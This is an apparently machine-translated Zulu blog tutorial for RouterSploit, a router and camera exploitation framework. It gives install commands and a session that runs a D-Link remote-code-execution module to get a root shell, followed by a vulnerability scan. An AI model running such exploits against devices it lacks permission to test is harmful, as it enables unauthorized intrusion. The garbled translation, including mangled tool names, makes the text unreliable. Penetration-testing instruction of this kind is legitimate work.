Ikhaya » Amathuluzi e-Linux » I-RoutterpLoit – UHLELO LOKUXHUMANA KOKUFUNDA KOKUFUNDA [2020]

I-RoutterpLoit – UHLELO LOKUXHUMANA KOKUFUNDA KOKUFUNDA [2020]

nge I-Suyash
routersploit

I-RoutterpLoit Ingabe uhlaka lokuxhashazwa olumangalisayo lwenzelwe ngqo amadivayisi ashumekiwe.

Leli thuluzi lingasetshenziswa yiPentester ukuskena ukuphepha kwamakhamera nama-routers.

Ama-RoutterpLpliat avelele avelele:

  • Inamakhodi ku-python.
  • Isikhombimsebenzisi se-command-line.
  • Ukuxhaswa kweDocker.
  • Amathuluzi ajwayelekile.

Os osekelwayo:

  1. I-Macos.
  2. I-Linux.
  3. Ucingo lwe-Android.
  4. I-Windows.

Ukufaka i-routersploit:

Izidingo:

  • -phambili
  • izicelo
  • Umanjana
  • Ima
  • Pycrypto

-Nokukhetha ngokuthanda:

  • -nepakepy – I-Bluetooth Low Energy

Ukufaka eKali Linux:

Landela imiyalo engezansi:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

I-Bluetooth Low Energy ukweseka:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Ukufaka ku-Ubuntu:

Landela imiyalo engezansi:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

I-Bluetooth Low Energy ukweseka:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Ukufaka kuma-macos:

Landela imiyalo engezansi:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Ukufaka ku-Docker:

Landela imiyalo engezansi:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Ungawuvuselela kanjani i-roulsploit?

Udinga ukubuyekeza ama-roelploupliet kaningi ukugwema ukuphazamiseka.

Amamojula amasha athunyelwa cishe nsuku zonke.

cd routersploit
git pull

Ungayisebenzisa kanjani i-routersploit?

Umsebenzi

Root @ Kaidiyo:~ / GIT / routersploit # ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _   `-. _ __ | | ___ _ _| |_
 |    // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __ / |  /\__ / / |_) | | (_) | | |_
  _| \_  ___ /  __ __ __,_|\__  __ ___|_|  \____ /| .__ /|_|\___ /|_|\__|
                                     | |
       UHLELO LOKUXHUMANA    |_|   ngengozi9
            Amadivayisi ashumekiwe
  
 Cowedame   : Bengazi ukuthi uyinkinga
 Ukuhumushela    : 3.3.0
 Ikhasi eliyikhaya   : I-HTTPS://www.threat9.com/ - @threatnine
 Joyina Slack : roulerploit.slack.com

 Joyina UHlelo lweNsongo lweBeta - I-HTTPS://www.threat9.com/

 Kusebenza: 128 Izikena: 4 Amakhredi: 165 Jengana: 4 Ukulayisha: 32 Abaqambi: 6

I-RSF >

Kusebenza:

Ukulungiselela ukuxhashazwa, Vele ukhethe imodyuli bese usetha ilitshe:

I-RSF > Sebenzisa ukuxhaphaza /
isebenzisana / 2wire / ukuxhaphaza / i-asmax / ukuxhashazwa / i-Asus / i-CISCO / ukuxhaphaza / i-Dlink / ukuxhashazwa / izixhumanisi / ukuxhaphaza / ukuxhaphaza / ukuxhashazwa / ukuxhashazwa /
I-RSF > Sebenzisa i-Exploits / Dlink / Dir_300_600_RCE
I-RSF (D-Link dir-300 & Dir-600 RE) >

Okokugcwalisa Sebenzisa ukhiye wethebhu.

Ukubonisa Izinketho, ukuthayiphashow:

I-RSF (D-Link dir-300 & Dir-600 RE) > Khombisa Izinketho

Izinketho zethagethi:


   Incazelo yezilungiselelo zamanje                                
   ----       ----------------     -----------                                
   Ikheli eliqondiwe eliqondisiwe e.g. http://192.168.1.1     
   itheku       80                   I-Target Port

Umsebenzirun nomaexploit iyala ukuxhaphaza ilitshe:

I-RSF (D-Link dir-300 & Dir-600 RE) > gijima
[+] Ithagethi isengozini
[*] Ukunxusa umyalo we-loop ...
cmd > ngingubani mina
impande

Ukusetha Izinketho:

I-RSF (D-Link dir-300 & Dir-600 RE) > Setha i-Target http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Kungenzeka ukubheka ukuthi ilitshe lisengcupheni ukuxhaphaza okuthile:

I-RSF (D-Link dir-300 & Dir-600 RE) > -hlola
[+] Ithagethi isengozini

Gijimashow info Ukubonisa imininingwane mayelana nokuxhaphaza.

Ukuskena ngezinhloso ezisengozini:

Izikena zivumela ngokushesha ukuqinisekisa uma ilitshe lisengcupheni kunoma yikuphi ukuxhaphaza.

Sebenzisa imiyalo efanayo ukukhombisa / ukusetha izinketho, futhi ukugijima.

I-RSF (Isithwebuli se-D-Link) > gijima
[+] isebenzisana / dlink / drm_932_info_disclosul isengozini
[-] isebenzisana / dlink / dir_300_320_615_auth_bypass ayisengozini
[-] isebenzisana / dlink / dsl_2750b_info_disclosul akuyona ingozi
[-] isebenzisana / dlink / DNS_320L_327L_RCE akuyona ingozi
[-] i-appleits / dlink / dir_645_password_disclosure akuyona ingozi
[-] isebenzisana / dlink / dir_300_600_615_info_disclosul akuyona ingozi
[-] isebenzisana / dlink / dir_300_600_rce ayikho engcupheni

[+] Idivaysi isengozini!
- isebenzisana / i-dlink / drm_932_info_disclosure

I-roelsploit esemthethweni

Funda Futhi: 1337ummeleli x

Amagama wokugcina:

I-RoutterpLoit iyithuluzi elimangalisayo elizolisebenzisa.

Uma ubhekana nanoma yiziphi izingqinamba mayelana I-RoutterpLoit. Qiniseka ukuthi ubeke amazwana phansi ngezansi. Iqembu lethu Cshawk lizoxhumana nawe asap.

Shiya Amazwana